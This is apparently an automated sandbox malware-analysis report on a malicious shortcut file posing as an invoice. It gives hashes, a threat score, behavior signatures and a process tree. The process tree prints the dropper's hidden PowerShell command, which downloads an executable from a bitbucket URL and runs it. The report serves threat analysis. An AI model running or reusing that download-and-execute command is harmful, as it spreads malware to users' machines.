Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
21/05/2024, 03:44
Static task
static1
Behavioral task
behavioral1
Sample
InvoiceandLast 4 Digit CC.lnk
Resource
win7-20240221-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
InvoiceandLast 4 Digit CC.lnk
Resource
win10v2004-20240226-en
10 signatures
150 seconds
General
-
Target
InvoiceandLast 4 Digit CC.lnk
-
Size
1KB
-
MD5
37fc383dd527ddd05fffdb60e32289a3
-
SHA1
a88265fac4df3c33048e0fb556f7add82ae10ad8
-
SHA256
0a37332f204930e2f59f4c8ba8cc07ca972135e4d7bcb09e1a33eaad47efeb97
-
SHA512
4265ea4d4b889468bb359058eef325566e8e44dd2d6bfdbf6a5e0573d5ff1cea511961342e11d77c0a317d7372121d008f2e0cb08a6167f5a4d555756758f40c
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2744 powershell.exe 2600 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2744 powershell.exe 2600 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2744 powershell.exe Token: SeDebugPrivilege 2600 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2724 wrote to memory of 2744 2724 cmd.exe 29 PID 2724 wrote to memory of 2744 2724 cmd.exe 29 PID 2724 wrote to memory of 2744 2724 cmd.exe 29 PID 2744 wrote to memory of 2600 2744 powershell.exe 30 PID 2744 wrote to memory of 2600 2744 powershell.exe 30 PID 2744 wrote to memory of 2600 2744 powershell.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\InvoiceandLast 4 Digit CC.lnk"1⤵
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden curl https://bitbucket.org/sharedocs/newdoc/downloads/Invoicesbv..exe -o C:\Windows\Temp\Debug.exe ;Start-Process C:\Windows\Temp\Debug.exe2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden curl https://bitbucket.org/sharedocs/newdoc/downloads/Invoicesbv..exe -o C:\Windows\Temp\Debug.exe3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2600
-
-